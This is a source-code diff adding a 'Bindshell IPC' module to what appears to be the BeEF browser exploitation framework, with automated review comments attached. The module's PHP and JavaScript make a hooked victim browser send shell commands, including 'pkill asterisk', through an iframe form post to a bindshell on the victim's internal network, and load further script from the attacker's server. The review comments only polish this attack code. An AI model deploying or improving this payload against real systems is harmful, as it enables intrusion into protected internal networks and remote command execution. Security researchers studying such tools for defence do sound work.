Initial Import
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
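--- a/modules/network/bindshell_ipc/index.php
+++ b/modules/network/bindshell_ipc/index.php
@@ -0,0 +1,61 @@
+<?
+// Copyright (c) 2006-2009, Wade Alcorn
+// All Rights Reserved
+// wade@bindshell.net - http://www.bindshell.net
+
+require_once("../../../include/common.inc.php"); // included for get_b64_file()
+DEFINE('JS_FILE', './template.js');
+?>
+
+<script>
+var rtnval = "OK Clicked";
+
+Element.Methods.construct_code = function() {
+
+// javascript is loaded from a file - it could be hard coded
+var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+
+var temp_cmds = document.myform.cmd_str.value;
+temp_cmds = temp_cmds.replace(/\n/g, "\\n")
+
+// replace sections of the code with user input
+b64code = b64replace(b64code, "IP_ADDRESS", document.myform.ip_str.value);
+b64code = b64replace(b64code, "PORT", document.myform.port_str.value);
+b64code = b64replace(b64code, "COMMAND", temp_cmds);
+
+// send the code to the zombies
+do_send(b64code);
+}
+
+// add construct code to DOM
+Element.addMethods();
+</script>
+
+<!-- PAGE CONTENT -->
+<div id="module_header">Bindshell (Inter-protocol Communication)</div>
+
+<div class="entry">
+Using <a href=http://www.bindshell.net/papers/ipc>Inter-protocol Communication</a> the
+zombie browser will send commands to a listening bindshell. The target address can be
+on the zombie's subnet which is potentially not directly accessible from the Internet.
+</div>
+
+<div id="module_subsection">
+<form name="myform">
+<div id="module_subsection_header">Target Address</div>
+<input type="text" name="ip_str" value="localhost"/>
+<div id="module_subsection_header">Port</div>
+<input type="text" name="port_str" value="4444"/>
+<div id="module_subsection_header">Commands</div>
+note: the semicolons and exit command are required
+<textarea name="cmd_str" rows="5" cols="80">id;ls /;pwd;
+pkill asterisk;
+exit;
+</textarea>
+<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
+</form>
+</div>
+
+
+
+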
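Review bot: The default contents of the `cmd_str` textarea include `pkill asterisk;`, so pressing "Send Now" without editing dispatches a service-stopping command to whatever address is in `ip_str`; a shipped default should be non-destructive, so that line should be dropped from the template text. `construct_code()` also substitutes `ip_str`, `port_str` and `cmd_str` into the template with no validation, and `PORT` appears in template.js as a bare token, so a guard such as `if (!/^\d{1,5}$/.test(document.myform.port_str.value)) return;` before the `b64replace` calls would keep a mistyped port from being turned into script text. The inline `onClick` handler resolves `construct_code` only because `Element.addMethods()` puts it on the element, which deserves a comment like `// reachable from onClick via the element's scope chain`. The bare `<?` open tag depends on `short_open_tag`, so `<?php` is the more portable form; `b64replace` and `do_send` are defined outside this file.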
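--- a/modules/network/bindshell_ipc/name.txt
+++ b/modules/network/bindshell_ipc/name.txt
@@ -0,0 +1 @@
+Bindshell IPC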
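--- a/modules/network/bindshell_ipc/template.js
+++ b/modules/network/bindshell_ipc/template.js
@@ -0,0 +1,89 @@
+var target_ip = 'IP_ADDRESS';
+var target_port = '220';
+var payload = "";
+
+var scr_l = '<scr' + 'ipt\>';
+var scr_r = '</scr' + 'ipt>';
+var max_line_len = 23;
+
+payload += "ls\\\n";
+
+function add_line(cmd) {
+payload += "echo -n '" + scr_l + "'\\\n";
+payload += "echo " + cmd + "\\\n";
+payload += "echo '" + scr_r + "'\\\n";
+}
+
+function add_echo(cmd) {
+payload += "echo " + "\\\"" + cmd + "\\\"" + "\\\n";
+}
+
+function construct_js(js) {
+add_line("a=''");
+
+js = js.replace(/ /g, "SP")
+
+//for(i=0; i<js.length; i+=max_line_len) {
+// add_line("a+=\\\""+js.substring(i,i+max_line_len)+"\\\"");
+//}
+
+add_line("\\\"" + js +"\\\"");
+
+add_line("s=String.fromCharCode(0x20)");
+add_line("a=a.replace(/SP/g,s)");
+}
+
+var code = "";
+function add_js(js) {
+code+=js+";";
+}
+
+//payload+=String.fromCharCode(0x12);
+//payload+=String.fromCharCode(0x13);
+
+//payload += "fi\\\n";
+
+add_echo(scr_l);
+add_echo("var result_id='" + result_id + "'");
+add_echo("function include(script_filename) {");
+add_echo("var html_doc = document.getElementsByTagName('head').item(0);");
+add_echo("var js = document.createElement('script');");
+add_echo("js.src = script_filename;");
+add_echo("js.type = 'text/javascript';");
+add_echo("js.defer = true;");
+add_echo("html_doc.appendChild(js);");
+add_echo("return js;");
+add_echo("}");
+add_echo("include('" + beef_url + "' + '/hook/ipc_bindshell.js.php');");
+add_echo("//__END__");
+add_echo(scr_r);
+
+payload += "COMMAND";
+
+var iframe = document.createElement("iframe");
+iframe.setAttribute("id","iwindow");
+//iframe.setAttribute("style", "visibility:hidden;");
+document.body.appendChild(iframe);
+
+function do_submit(ip, port, content) {
+myform=document.createElement("form");
+myform.setAttribute("name","data");
+myform.setAttribute("method","post");
+myform.setAttribute("enctype", "multipart/form-data");
+
+myform.setAttribute("action","http://" + ip +
+":" + PORT + '/abc.html;sh;');
+//":" + PORT + "/abc.html");
+document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
+
+myExt = document.createElement("INPUT");
+myExt.setAttribute("id","extNo");
+myExt.setAttribute("name","test");
+myExt.setAttribute("value",content);
+myform.appendChild(myExt);
+
+myform.submit();
+}
+
+do_submit(target_ip, target_port, payload);
+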
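Review bot: `do_submit(ip, port, content)` never reads its `port` parameter: the form action is built from the bare `PORT` token, which only becomes a value through index.php's textual substitution, while the argument actually passed is the hard-coded `target_port = '220'`. The parameter and the constant should agree, and the file needs a header comment stating that `IP_ADDRESS`, `PORT` and `COMMAND` are placeholders replaced before the script is sent, and that `result_id` and `beef_url` are expected from the surrounding hook code, since neither is defined here. `myform` and `myExt` are assigned without `var` and leak as globals in the page; `var myform = document.createElement("form");` and likewise for `myExt` would contain them. `construct_js`, `add_js`, `code` and `max_line_len` are never used in this file and, together with the commented-out lines, could be left out of the import.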